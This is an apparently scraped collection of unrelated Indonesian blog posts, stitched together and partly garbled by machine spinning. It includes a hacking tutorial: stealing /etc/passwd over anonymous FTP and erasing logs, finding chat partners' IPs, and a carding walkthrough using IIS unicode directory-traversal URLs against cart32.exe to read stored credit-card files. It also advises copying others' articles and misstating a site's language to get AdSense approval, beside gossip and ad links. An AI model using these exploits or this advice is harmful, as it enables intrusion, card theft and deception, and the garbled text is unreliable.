Reply from 127.0.0.1: bytes=32 time<10ms ttl="128" bytes="32" ttl="128" bytes="32" ttl="128" bytes="32" ttl="128" sent =" 4," received =" 4," lost =" 0" minimum =" 0ms," maximum =" 0ms," average =" 0ms" bytes="32" time="3448ms" ttl="54" bytes="32" time="2276ms" ttl="54" bytes="32" time="1799ms" ttl="54" bytes="32" time="2850ms" ttl="54" sent =" 4," received =" 4," lost =" 0" minimum =" 1799ms," maximum =" 3448ms," average =" 2593ms">pwd
/etcme
2. 'lcd' to change the local directory.
contohnya. ftp>lcd C:\windows
local directory now C:\windows
3. 'cd' to change the remote directory.
contohnya. ftp>cd /etc
remote directory now /etc
4. 'mput' to send multiple files to remote machine.
contohnya. ftp>mput *.*
sends all files from C:\windows to /etc
5. 'mget' to get multiple files from remote machine.
contohnya. ftp>mget *.*
gets all files from /etc to C:\windows
6. 'open' to establish a connection with remote host.
contohnya. ftp>open www.target.com
7. 'bye' closes the connection and quits from ftp

Untuk perintah lainnya dari ftp silakan lihat help mereka.

Sekarang pada yang port FTP (prot 21) adalah membuka www.nosecurity.com. Seorang hacker akan terhubung ke situs tersebut menggunakan ftp www.nosecurity.com pada dos prompt. Kemudian dia akan mencoba login secara anonymous. Dengan anggapan bahwa www.nosecurity.com menggunakan linux server, maka hacker tersebut akan mengtikkan perintah get /etc/apsswd untuk mendaptkan file password dan mengcracknya. Jika anda adalah seorang hacker, maka jangan lupa untuk menghapus log tersebut.



5. netstat

Anda dapat menentukan suatu koneksi dengan remote machine pada port tertentu, hanya saat port tersebut dibuka pada remote machine. Sebagai contoh, jika anda ingin menentukan sebuah koneksi dengan www.target.com pada port 23 (telnet) maka port tersebut seharusnya terbuka pada www.target.com. Dan seluruh aktifitas hacking umumnya menggunakan port yang terbuka. Mengetikkan netstat pada dos prompt memberikan:


Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

Opsi akan menjelaskan fungsinya masing-masing. Dan yang terpenting adalah opsi a dan n. Opsi a menampilkan seluruh port yang terbuka pada mesin tersebut. Dan jika saya menggunakan opsi n maka akan menunjukkan ip address sebagai ganti dari domain. Saya mendapatkan hal berikut ini jika saya mengetik netstat a pada command prompt.


Active Connections

Proto Local Address Foreign Address State
TCP chintan:1027 0.0.0.0:0 LISTENING
TCP chintan:80 0.0.0.0:0 LISTENING
TCP chintan:135 0.0.0.0:0 LISTENING
TCP chintan:6435 0.0.0.0:0 LISTENING
TCP chintan:1025 0.0.0.0:0 LISTENING
TCP chintan:1026 0.0.0.0:0 LISTENING
TCP chintan:1028 0.0.0.0:0 LISTENING
TCP chintan:1309 0.0.0.0:0 LISTENING
TCP chintan:1310 0.0.0.0:0 LISTENING
TCP chintan:1285 rumcajs.box.sk:80 ESTABLISHED
TCP chintan:1296 l an-202-144-78-3.maa.sify.net:80 CLOSE_WAIT
TCP chintan:1297 lan-202-144-65-14.sify.net:80 ESTABLISHED
TCP chintan:1310 cdn-v13.websys.aol.com:80 ESTABLISHED
TCP chintan:1220 aiedownload.cps.intel.com:ftp ESTABLISHED

Proto menyatakan nama protocol tersebut, localaddress memberikan ipaddress kita dan port yang terbuka. Foreign Address menyatkaan ipaddress dengan namor port yang terhubung ke kita. State menyatakan pernyataan saat ini jika suatu koneksi established atau listening atau hanya waiting .

Sebagai contoh jika saya membuka www.yahoo.com maka saat saya menjalankan netstat a saya akan mendapatkan masukan seperti ini:

"TCP 203.43.50.81:2034 www.yahoo.com:80 ESTABLISHED"

Komputer saya dengan ip 203.43.50.81 melalui port 2034 terhubung dengan yahoo pada port 80


*************
Newbie tip: Dengan cara ini anda bisa mendapatkan ip seseorang yang chatting dengan ada. Pertama kali jalankan netstat an dan lihat dibawah foreign ip address. Sekarang mulailah private chating dengan orang lain. Juga jalankan netstat an dan anda akan mendapatkan satu lagin foreign ip pada akhirnya. Inilah ip orang tersebut.
*************


Menemukan dengan mudah MRTG dari graphing mikrotik
MRTG adalah suatu aplikasi yg dibuat untuk melihat besarnya traffic yang terjadi pada saat pemakaian internet. Itu digambarkan dalam bentuk grafik.

Mikrotik memiliki fasilitas tersebut namanya tool graphing, idealnya MRTG mikrotik di batesi agar tidak bisa dilihat sembarang orang. Mungkin bisa di tambahkan rule allow acces IP mana saja yang diijinkan untuk melihatnya.

Kita dapat menemukan dengan mudah MRTG dari graphing mikrotik yang tidak di filter, caranya:

buka www.google.co.id
ketikkan key word = "mikrotik intitle:graphing"
pilih seach the web untuk semua web/IP yang ingin dicari
atau page from Indonesia untuk hanya web/IP indonesia saja
FREE PROXY List ... cucok buat macem2 kegunaan ^^
source: from nowwayhome email send to me ^^ thanks guys

Demi menjaga IP address kita dari polisi web ... ups ^^ maksudnya dari admin n
pemilik Ip yang akan kita intip ^^ ada baiknya kita redirect dulu alamat IP kita
supaya nggak nongol sembarangan ^^ .... mudah2an bisa membantu, berikut list free
proxy yang berhasil ai capture:

-http://www.proxy4free.com
-http://www.allproxies.com
-http://www.proxymania.com
-http://www.freeproxysite.com
-http://www.freeproxy.ca
-http://www.hidemyass.com
-http://www.freeproxy.ru
-http://www.proxyblind.org
-http://www.anonymouse.org/anonwww.html
-http://www.theproxyfree.com
-http://www.1freeproxy.com
-http://www.sweetproxies.com
-http://www.avoidthefilter.com
-http://www.proxy-list.org
-http://www.freeproxyserver.net
-http://www.freshproxy.org/
-http://www.turbohide.com
-http://www.freeproxytemplates.com
-http://www.oddproxy.com
-http://www.hiddencloak.com
-http://www.ghacks.net/2006/08/04/free-web-proxy-list/


sumber dalam negeri:

Blognya om herry nugraha
http://borneo.blogsome.com/2007/04/30/daftar-free-proxy-anonymous-populer/


yach segitu dulu dech ^^ kalo mau lebih banyak search aja lewat Google ya^^

Reset Handphone

*#30# : Menampilkan “private number” yang menghubungi Anda.

*#73# : Mereset timer ponsel dan skor game (pada beberapa ponsel)

*#7780# : Mengembalikan ke setting pabrik

*#2820# : Alamat IP perangkat Bluetooth (hanya untuk yang memiliki fitur bluetooth)

xx# : Akses cepat ke nama/ nomor telepon di phone book ponsel

*#06# : Menampilkan nomor IMEI (International Mobile Equipment Identity)

*#0000# : Menampilkan versi software ponsel. Baris pertama menunjukkan versi software ponsel, baris kedua menunjukkan tanggal pembuatan software, baris ketiga menunjukkan tipe kompresi yang digunakan.

*#9999# : Kode alternatif jika *#0000# tidak bekerja.

*#21# : Mengecek nomor pengalihan ”All Calls” yang digunakan

*#2640# : Menampilkan kode keamanan ponsel yang digunakan (bila masih menggunakan standar kode tidak akan terlihat)

*#43# : Mengecek status call waiting

*#61# : Mengecek nomor pemanggil yang dialihkan ketika Anda tidak menjawab (Jika anda mengaktifkan pengalihan panggilan/ call divert)

*#62# : Mengecek nomor pemanggil yang dialihkan ketika Anda di luar jangkauan (Jika anda mengaktifkan pengalihan panggilan/ call divert)

*#67# : Mengecek nomor pemanggil yang dialihkan ketika Anda sedang sibuk (Jika anda mengaktifkan pengalihan panggilan/ call divert)

**21*number# : Menghidupkan pengalihan ”All calls” pada nomor yang diisi.

**61*number# : Menghidupkan pengalihan ”No Reply” pada nomor yang diisi.

**67*number# : Menghidupkan pengalihan ”On Busy” pada nomor yang diisi.

*#67705646# : Mengganti logo operator pada Nokia 3310 dan 3330

*#746025625# : Menampilkan status SIM clock. Jika ponsel anda mendukung fitur penghemat energi, akan keluar tulisan “SIM Clock Stop Allowed”, artinya Anda akan mendapatkan waktu standby yang lebih panjang.

*#3370# : Mengaktifkan Enhanced Full Rated Codec (EFR). Ponsel Nokia Anda akan memakai kualitas suara terbaik, namun fitur ini memerlukan energi lebih sehingga sedikit menguras daya baterai. Catatan: kode ini tidak berlaku di ponsel-ponsel symbian.

#3370# : Menonaktifkan Enhanced Full Rated Codec (EFR).

*#4720# : Mengaktifkan Half Rated Codec. Ponsel Nokia Anda akan memakai kualitas suara lebih rendah, sehingga bisa menghemat energi baterai sekitar 30%.

#4720# : Menonaktifkan Half Rated Codec.

*#7760# : Menampilkan kode pabrikan (untuk sebagian besar ponsel tipe lama).

Crading $ Crack

1. Sama seperti diatas, Cari target dahulu di google.com dgn keyword allinurl:/cart32.exe/

2. Misalkan kita mendapat target dg url:

http://www.contoh.com/scripts/cart32.exe/blablabla , maka:

3. Ganti url tsb menjadi ->


http://www.contoh.com/scripts/
4. Modifikasi url tsb dg memasukkan unicode dibelakangnya -> http://www.contoh.com/scripts/
5. Contoh unicode utk path /scripts/ : –>
/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
Sedangkan utk path /cgi-bin/ ->
/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
6. Sebagai contoh, pada url diatas menggunakan path /scripts/ maka diubah menjadi http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
7. string diakhir unicode dg keterangan dir+c:\ maksudnya kita sedang berada dan melist directory c server target!
8. Untuk masuk ke directory cc’s ganti perintahnya unicode dgn -> http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\
9. Kita akan output list dari file .32 sebagai contoh namanya WRBURNS-001065.c32
10. Nah.., utk melihat filenya dg unicode http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\WRBURNS-001065.c32
11. Kalo tidak berhasil, kita masih bisa mencobanya dengan unicode yg laennya.
12. Ok, semoga berhasil, materi ke-2 Selesai.
Michael Jackson Might Die: For real this time says Intouch Mag

StumbleUpon Digg Reddit Mixx del.icio.us MySpace Fark Facebook TwitThis Propeller Wikio Yahoo! Buzz

michael-jackson

**UPDATE June 09: Michael Jackson dead **

Intouch Weekly print edition are running a story that Michael Jackson is so sick, with a rare genetic disease that he might die. For realz, this time, not faking it to get out of some sort of court appearance, jail cell etc.

According to Intouch Michael has the rare genetic disease Alpha-1 antitrypsin deficiency.

award-winning investigative journalist Ian Halperin tells In Touch that he believes that the King of Pop is fighting for is life. “Michael has a very severe lung condition called Alpha-1 antitrypsin deficiency,” Halperin, a New York Times best-selling author, tells In Touch exclusively. “He’s had it for years but it’s gotten worse. He needs a lung transplant but may be too weak to go through with it. He also has emphysema and chronic gastrointestinal bleeding, which his doctors have had a lot of trouble stopping. It’s the bleeding that is the most problematic part. It could kill him.”

Because this genetic disease is so rare - Alpha-1 antitrypsin deficiency affects just 1 in 5,000 Americans - it’s been difficult to treat, says Halperin. “For years, Michael has been working with his own doctors to make sure his condition doesn’t progress. He has been on many medications that have stabilized him.” But as the disease has progressed, Halperin says that the pop star’s quality of life has diminished. “He can barely speak,” says Halperin. “Also, the vision in his left eye is 95 percent gone.”

Michael Jackson’s brother Jermaine Jackson confirmed to Foxnews that Michael was desperately ill saying. “He’s not doing so well right now. This isn’t a good time.”

I guess that puts paid to the much talked about Jackson Five tour.

See here for more information on the disease.

I can see the celebrity fundraising specials now, although it does explain a bit
http://ngebux.com/?r=sigitpermana

Ini link yang tiap kali elu ngeklik bakal dibayar... cuma sayang sebelum elu dapet 50rb iklannya dibatesin cuma 3

Monday, April 6, 2009

Tips Cara Pasang Iklan Online Gratis Ke Ribuan Website Iklan Baris - Memasang Iklan Di Internet


Kalau Anda seorang internet marketer. Apakah anda menjadi reseller, menjual barang secara online atau memiliki web perusahaan, Anda perlu mengiklankannya. Alasan utama untuk Anda mengiklankan situs web Anda adalah permainan Angka. lebih banyak orang tahu web Anda, lebih banyak yang melihat produk Anda. Akan lebih besar kemungkinan terjadi penjualan.

Ada berbagai cara untuk mengiklankan web Anda. Bisa melewati milis, web iklan baris, banner, dsb. Dengan menggunakan iklan baris gratis yang banyak bertebaran di internet, Anda memiliki berbagai keuntungan.

Selain gratis, web iklan biasanya disertai SEO sehingga web Anda bisa cepat dilacak keberadaanya oleh mesin pencari. Namun sering kita tidak menggunakan iklan baris karena malas mengisi berbagai form yang ada di halaman pengisian iklan.

Kalau Anda mencari sebuah tools atau alat untuk promosi online secara gratis, ada beberapa web yang menawarkan jasa pemasangan iklan Anda secara Online GRATIS.

Bahkan, beberapa memberikan Bonus Rp.25.000 setiap kali Anda mendaftar. Kelebihan lainnya, beberapa website menawarkan pemasangan iklan secara otomatis ke ratusan iklan baris yang tergabung di dalamnya tanpa campur tangan Anda sama sekali.

Tanpa script, tanpa download

Hanya perlu mendaftar dan mulai memasang iklan Anda. Berikut beberapa website yang menyediakan layanan ini. Anda bisa saja mengiklankan web Anda tanpa mendaftar, namun coba cermati tawaran fitur mereka jika Anda mendaftar.

1. Growurl.com

Di antara semuanya, Growurl adalah web penyedia jasa pemasangan iklan gratis pertama dengan total website yang sudah ‘ditumbuhkan’ sebanyak 9438 website (per 24 Juni 2008). Warna dasarnya putih dengan siluet sejenis tanaman

Growurl.com memberi nama pemasangan iklan otomatisnya dengan nama SubmitZzz, yang mampu memasang iklan ke lebih dari 100 web iklan, blog dan mail list seperti publish.web.id dan suryaiklan.com. Selain itu, Growurl.com menawarkan juga fitur pengiklanan seperti Google adwords atau yahoo sponsored search bernama Growurl Text Ads Service.

Fitur Growurl.com bisa membuat membernya tidak perlu membeli kredit dari Growurl.com. Caranya antara lain dengan memasang logo Growurl.com, menulis review, mereferensikan teman untuk bergabung, memasang script Mini Ads di halaman website, atau mendaftarkan web iklan kita menjadi salah satu bagian dari pengiklanan Growurl.com.

Growurl.com juga menyewakan script website jasa pemasangan iklan serupa. Sehingga diharapkan ke depannya banyak website pemasangan iklan secara otomatis dan gratis. Diharapkan, ke depannya pesaran dalam bentuk online dapat menjadi lebih semarak lag

Tumbuhkan traffic dengan Growurl.com

2. Adsburn.com

Web penyedia jasa pemasangan iklan gratis ini berbeda tampilan dari yang lain, dengan warna dasar hitam yang misterius ditambah gambar sesosok setan yang terbakar. Logo setan ini mengesankan sang setan terbakar mengikuti Fire dari Adsburn.

Fitur pemasangan iklan secara otomatis milik Adsburn disebut SubmitZzz. Fitur ini bisa memasang iklan kita ke sekaligus ratusan web iklan seperti 1iklan.com dan zonapromosi.com.

Adsburn.com juga memanjakan membernya dengan memberikan kesempatan menambah kredit. Dengan fasilitas ini, membernya dapat menggunakan Adsburn.com dengan GRATIS selamanya. Fitur itu antara lain dengan menulis review, mereferensikan teman untuk bergabung dan meletakkan logo di halaman depan website/blog kita.
Adsburn telah ‘membakar’ 173 website. Dan akan bertambah lebih banyak lagi, mengingat hingga 30 Juni 2008, Adsburn.com masih memberikan Bonus pendaftaran sebesar Rp.25.000

'Bakar' iklan dengan Adsburn.com

3. Indoklikads.com

Web autosubmit berwarna dasar putih dan ungu ini memiliki logo berbentuk serangga jenaka seperti semut. Sebagai salah satu pemain muda,saat ini (24 Juni 2008), jumlah web yang sudah dipromosikan olehnya adalah 41 website.

Fitur pemasangan iklan secara otomatisnya diberi nama Autopilot Submit, yang bisa memasang iklan kita ke lebih dari 100 website iklan gratis dan direktori seperti startindonesia.com dan ads4on.com. Selain itu, Indoklikads juga memberikan tawaran beriklan di Indoklikads Mini Ads

Selain itu, indoklikads memberikan kesempatan menambah kredit sehingga membernya dapat menggunakan indoklikads dengan GRATIS selamanya. Fitur itu antara lain dengan menulis review, mereferensikan teman untuk bergabung dan meletakkan logo di halaman depan website/blog kita.

Hingga 30 Juni 2008, Indoklikads memberi Bonus Rp.25.000 bagi pemilik web yang mendaftar menjadi membernya

Mulai promosi di indoklikads.com

4. Kirimiklan.com

Ciaaaatttt !!!

Itulah kilas pertama melihat home page milik Kirimiklan.com. Web jasa pemasangan iklan ini menampilkan logo seorang pesilat yang sedang ‘in action’. Logo mungilnya juga berbentuk siluet seorang pesilat sedang menendang.

Fitur pemasangan iklan otomatis Kirimiklan.com diberi nama KirimZzz, yang bisa memasang iklan kita ke lebih dari 100 website iklan gratis dan direktori seperti wulansari.com dan barisindonesia.com. Hingga hari ini, Kirimiklan telah men “Ciiaatttt !!” 101 website milik membernya.

Hingga 30 Juni 2008, Kirimiklan.com masih memberi Bonus Rp.25.000 bagi member baru yang mendaftar. Selain itu, Kirimiklan.com memberikan kesempatan menambah kredit sehingga membernya dapat menggunakan fitur-fitur Kirimiklan.com dengan GRATIS selamanya.

Fitur itu antara lain dengan menulis review, mereferensikan teman untuk bergabung dan meletakkan logo di halaman depan website/blog kita, atau mendaftarkan web iklan kita menjadi salah satu affiliasi dari Kirimiklan.com.

Kirim iklan ke Kirimiklan.com

5. Domorepromo.com

“Promote Your website Now !!” Begitulah tag line dari domorepromo.com. memiliki logo seperti tanda seru yang bersinar, domorepromo.com sepertinya benar-benar menginginkan agar semua membernya memiliki website yang “terlihat” setelah menggunakan layanan Domorepromo.com.

Fitur pemasangan iklan otomatis Domorepromo.com diberi nama Autopromo, yang bisa memasang iklan kita ke lebih dari 100 website iklan gratis, blog dan direktori seperti iklanadvertise.com dan iklanbarismu.com. Hingga hari ini, Domorepromo “menerangi” 49 website milik membernya.

Domorepromo.com masih memberi Bonus Rp.25.000 bagi member baru yang mendaftar hingga 14 July 2008. Selain itu, Domorepromo.com memberikan kesempatan menambah kredit sehingga membernya dapat menggunakan fitur-fiturnya dengan GRATIS selamanya.

Fitur itu antara lain dengan menulis review, mereferensikan teman untuk bergabung dan meletakkan logo di halaman depan website/blog kita, atau mendaftarkan web iklan kita menjadi salah satu affiliasi dari Domorepromo.com.

Promosi kan web mu dengan Domorepromo.com

KALAU MAU PASANG IKLAN TANPA DAFTAR LANGSUNG KESINI

bjm.promo.web.id adalah salah satu media periklanan di internet, disini anda bisa memasang iklan anda dengan gratis maupun berbayar (premium). Semuanya dilakukan secara praktis tanpa perlu mendaftar terlebih dahulu, dijamin iklan anda akan terindex oleh mesin2 pencari terkenal seperti google, yahoo dll.

Selamat Mencoba!!!

Iklan baris gratis tanpa daftar Banjarmasin promo. Cara pasang iklan :

* Klik submit ads utk pasang iklan
* Masukan nama, email dan alamat web anda
* Pilih kategori iklan anda
* Pilih ads type, disini anda juga bisa pilih premium ads tetapi
sebelum anda mentransfer biaya iklan, iklan anda akan tetap dianggap
sebagai free ads
* Masukan judul iklan anda
* Masukan isi iklan anda
* Bisa masukan gambar kecil
* Masukan security code
* Terakhir Klik submit ads

Tip Mempercepat Internet Explorer (IE)

Tip Mempercepat Internet Explorer (IE)

Cara Mempercepat Internet explorer (IE) anda

This way is more useful for some people who have a dial up connection. This is work for both Dial up and ADSL connections it makes your internet explorer Browser loads web pages more faster.

METHOD 1

1. click start > run
2. type regedit > enter
3. browse folder HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ InternetSettings
4. right click @ windows right > New > DWORD
5. type MaxConnectionsPerServer > you can set value (the higher the number, the more good speed you get, eg : 99)
6. create another DWORD >type MaxConnectionsPer1_0Server
7. then put a high value as mentioned above
8. then, restart IE, finished.


METHOD 2

Dont save encrypted pages to disk - This has a bifold benefit. First, it saves your computer the time and accomplishment of extenuative pages to the Temporary Internet Files folder. Plus, it makes abiding that there’s no almanac on your harder drive of defended web pages, which are the ones that are acclimated for passwords and such things.

How to do it:

1. On the card bar, bang on Tools, again on Internet Options on the card that appears.
2. A new window will arise alleged Internet Options. At the top there are six tabs. Bang on the one on the appropriate that says “Advanced.
3. Scroll down to the area that says “Security.” This should be the basal section. Analysis the advantage that says “Don’t save encrypted pages to disk.”
4. Bang on the OK button to abutting the window, and restart Internet Explorer.


Don’t automatically download images - The aspect of web pages that takes the longest time to download is images. If you about-face off this advantage and about-face on addition one, you can still get the accustomed anatomy of web pages, but after the cat-and-mouse for images to download. Usually, the a lot of advantageous advice is in argument form, anyway.

How to do it:

1. On the card bar, bang on Tools, again on Internet Options on the card that appears.
2. A new window will arise alleged Internet Options. At the top there are six tabs. Bang on the one on the appropriate that says “Advanced.”
3. Scroll down to the area that says “Multimedia.” This should be about halfway. Uncheck the advantage beneath Multimedia that says “Show pictures” and analysis the advantage that says “Show angel download placeholders.”
4. Bang on the OK button to abutting the window, and restart Internet Explorer.


Dont automatically play animations or videos - Animations and videos are usually absolutely ample files to download. Absolutely often, in fact, I ascertain that I dont even wish to see them.

How to make it:

1. On the card bar, bang on Tools, again on Internet Options on the card that appears.
2. A new window will arise alleged Internet Options. At the top there are six tabs. Bang on the one on the appropriate that says “Advanced.”
3. Scroll down to the area that says “Multimedia.” This should be about halfway. Uncheck the two options beneath Multimedia that says “Play animations” and “Play videos.”
4. Bang on the OK button to abutting the window, and restart Internet Explorer.


Reduce the admeasurement of your page history - Your page history (the account of pages you get while youre accounting in a URL) takes up amplitude in anamnesis that is allocated to Internet Explorer. Freeing up that anamnesis makes your absolute arrangement run faster and makes it accessible for Internet Explorer to advance added anamnesis for apprehension pages, appropriately authoritative pages arise faster.

How to do it:

1. On the card bar, bang on Tools, again on Internet Options on the card that appears.
2. A new window will arise alleged Internet Options. Towards the basal of the window should be a band that says “Days to accumulate pages in history:” After that is a box with a amount on it. Bang on the box, backspace to annul the absolute number, and blazon in a baby number. I usually use 1.
3. Bang on the OK button to abutting the window, and restart Internet Explorer.


Empty Temporary Internet Files binder if browser is closed - Doing this helps save a lot of harder drive space, and aswell makes surfing faster back your computer isn’t searching through so abounding pages to acquisition out if the adapted page is already in the cache.

How to do it:

1. On the card bar, bang on Tools, again on Internet Options on the card that appears.
2. A new window will arise alleged Internet Options. At the top there are six tabs. Bang on the one on the appropriate that says “Advanced.”
3. Scroll down to the area that says “Security.” This should be the basal section. Analysis the advantage that says “Empty Temporary Internet Files binder if browser is closed.”
4. Bang on the OK button to abutting the window, and restart Internet Explorer.

Cara mendaftar di GOOGLE ADSENSE

CARA MENDAFTAR DAN PERATURAN GOOGLE ADSENSE


Apakah anda selama ini selalu gagal mendaftar di Adsense ? lalu, apa permasalahan anda sehingga selalu di tolak oleh Adsense sebagai publisher ? Mungkin saya bisa memberikan solusinya.

Pengalaman saya beberapa kali ditolak oleh Google Adsense saat mendaftar sebagai publisher, yah akhirnya setelah berbagai cara akhirnya diterima juga.


Bagi yang belum tahu apa itu Adsense, saya jelaskan secara singkat:


Google Adsense adalah salah satu cara / solusi mencari duit / uang di internet, jadi , kita dibayar karena website kita menampilkan iklan yang berupa potongan script yang ditempelkan di situs kita.

Tentang cara / mekanisme iklan itu bekerja, untuk sementara anda tidak perlu tahu, yang penting saya memberikan solusi / tips supaya anda bisa diterima secara cepat / kilat hanya dalam 1-3 hari, malahan mungkin dalam hitungan kurang dari 24 jam (…itu berdasarkan pengalaman saya lhoo..)



Mungkin agak tricky apa yang saya tulis di artikel ini , tetapi it’s ok lah .. selama kita bisa mencari devisa buat negara kita.


Langkah-langkah yang mesti anda perhatikan adalah:




[a] Apakah anda sudah pernah ditolak setelah mendaftar sebelumnya ke Google Adsense ?

Jika pernah, apa yang menjadi masalah / alasan mereka ketika situs anda di tolak ?

Apakah situs anda berbahasa Indonesia ?

Jika ya, bukan masalah, anda bisa mendaftar lagi….


Jika tidak, lalu apakah situs anda berisi content pornografi ?

Jika ya, lalu apakah situs anda berada di blogspot / blogger ?

Jika situs anda ditolak karena berisi content pornografi yang berada di blogspot / blogger, LUPAKAN UNTUK MENDAFTAR KEMBALI DENGAN ALAMAT YANG SAMA. Gunakan alamat lain untuk mendaftar kembali.


[b] Anggap saja anda tidak pernah mengenal apa itu Adsense, dan tidak pernah mendaftar sebelumnya. Saya akan berikan tips kilat kepada anda. Langkah-langkah yang perlu ambil supaya mudah di approve Google Adsense sebagai publisher adalah :


1. Bikin account di Blogger, caranya, kunjungi :


http://www2.blogger.com/


2. pilih “CREATE YOUR BLOG NOW”





3. Isi form data2 anda dari email address, Password, Display Name, Word Verification, dan centang Acceptance of Terms sebagai persetujuan anda mengikuti aturan mereka.


4. Beri judul Blog anda, dan berikan nama URL alamat blogspot anda.


5. Pilih template yang cucok dengan selera anda.


6. Setelah itu “START POSTING” artikel baru ?





Tunggu dulu….


7. Jika anda yang tidak fasih dalam bahasa inggris atau mengalami kesulitan mencari ide, lebih baik anda COMOT dari Internet Artikel-artikel yang berbahasa Inggris.


Saya pakai istilah PINJEM, bukan NYOLONG artikel, karena begitu SITUS BLOGGER kita diapprove google adsense, anda bisa hapus dan ganti dengan artikel berbahasa Indonesia.


8. Setelah “MEMINJAM” artikel orang lain di internet, baru START POSTING..


9. Muntahkan semua artikel yang baru anda “PINJEM” dari orang lain yang berbahasa Inggris ke artikel pertama anda.

Ingat : USAHAKAN NYARI ARTIKEL YANG PANJANG (walaupun anda tidak tahu apa isinya)


Saran saya : comot dari wikipedia atau answer.com, atau lebih baik, di campur aduk (jaga2 siapa tahu sekarang Google mempunyai teknik baru dalam melacak copyright artikel lain di internet).


10. Setelah postingan artikel pertama anda berhasil, mulailah sign up / register / daftar dengan klik gambar button di atas.


Daftarlah dari gambar berlogo Google Adsense (klik dari gambar),

kemudian pilih BUTTON: CLICK HERE TO APPLY seperti gambar dibawah:





dan lengkapi data diri anda di formulir isian yang nantinya disodorin mereka. Hati-hati dalam pengisian, biasanya kita terjebak saat mengisi WEBSITE LANGUAGE kita, lebih baik kita memilih ENGLISH, karena kalau anda mengisi website anda berbahasa Indonesia, anda akan di tolak mereka.


11. Jangan lupa juga isi nomor telepon anda di mulai dengan prefix 62, misalnya nomor telpon anda 02167424433, maka isilah nomor telp dengan 622167424433


12. Anda akan dikirimkan email notifikasi bahwa anda adalah pemilik sah EMAIL yang anda daftarkan, kemudian anda disuruh mengclick URL yang dikirimkan mereka.Setelah itu ….


13. Centang semua jika muncul :




AdSense applicants must agree to adhere to AdSense program policies (details)

I agree that I will not click on the Google ads I’m serving through AdSense.

I will not place ads on sites that include incentives to click on ads.

I agree that I can receive checks made out to the payee name I have listed above.

I will not place ads on sites that include pornographic content.

I certify that I have read the AdSense Program Policies.



14. Centang pilihan pertama jika muncul :




Would you like to have a single account for all Google services?

You can use your existing Google account email address and password for AdSense as well. Or you can choose new ones just for AdSense.

1. I’d like to use my existing Google account for AdSense.


2. I’d like to choose a new login name and password just for AdSense.



Setelah itu akan muncul KOTAK isian LOGIN, lalu loginlah dengan username dan password yang sama dengan username / password yang anda daftar di WWW2.BLOGGER.COM itu.


13. Tunggu email dari mereka beberapa hari kemudian, yang berisi “CONGLATURATIONS !!”



Peraturan Tentang Google Adsense

Tulisan berikut diambil dan diterjemahkan dari halaman Google AdSense Program Policies dengan tujuan untuk memudahkan publisher AdSense Indonesia untuk memahami dan mengerti aturan2 yg diterapkan oleh Google berkaitan dengan program Google AdSense mereka. Setiap pelanggaran aturan yg dilakukan oleh publisher, sekecil apapun, akan dapat menyebabkan keanggotaan AdSense mereka dihapus oleh Google.


Sekedar informasi, artikel berikut ditulis berdasarkan update ketentuan Google AdSense Program Policies pada bulan Januari 2007. Sewaktu-waktu, Google akan melakukan perubahan/penambahan/pengurangan aturan mereka, jadi untuk informasi yg lebih up-to-date, silahkan langsung mengacu pada halaman Program Policies mereka.


Semoga bermanfaat!

Klik dan Impresi Yg Tidak Valid


Segala klik pada ad units harus berasal murni dari keinginan pengunjung. Berbagai cara untuk menciptakan klik atau impresi pada ad units secara keras tidak diperbolehkan. Ini meliputi, tapi tidak terbatas pada, klik atau impresi berulang yg dilakukan secara manual maupun otomatis, penggunaan layanan pihak ketiga yg menghasilkan klik atau impresi seperti program paid-to-click, paid-to-surf, autosurf, dan click exchange / click club, ataupun software yg sejenis. Sebagai catatan, melakukan klik terhadap ad unitsi sendiri juga dilarang. Segala bentuk pelanggaran terhadap aturan ini dapat mengakibatkan keanggotaan AdSense Anda dihapuskan.

Mendorong Terjadinya Klik


Untuk meyakinkan hasil yg optimal baik bagi pemasang iklan maupun pengunjung situs, publisher tidak diperbolehkan untuk meminta pengunjung mengklik iklan AdSense yg ada pada situs mereka ataupun menggunakan cara2 yg tersembunyi untuk menghasilkan klik. Jika dijabarkan, publisher AdSense:


Tidak diperbolehkan untuk mendorong pengunjung mengklik ad units mereka dengan menggunakan kata2 seperti “click the ads,” “support us,” “visit these links,” dan kata2 lain yg sejenis.

Tidak diperbolehkan untuk menarik perhatian pengunjung ke iklan yg ada dengan menggunakan panah atau gambar2 lain yg sejenis.

Tidak diperbolehkan untuk meletakkan gambar di sekitar ad units yg dapat membuat pengunjung mengira bahwa gambar tersebut adalah bagian dari iklan.

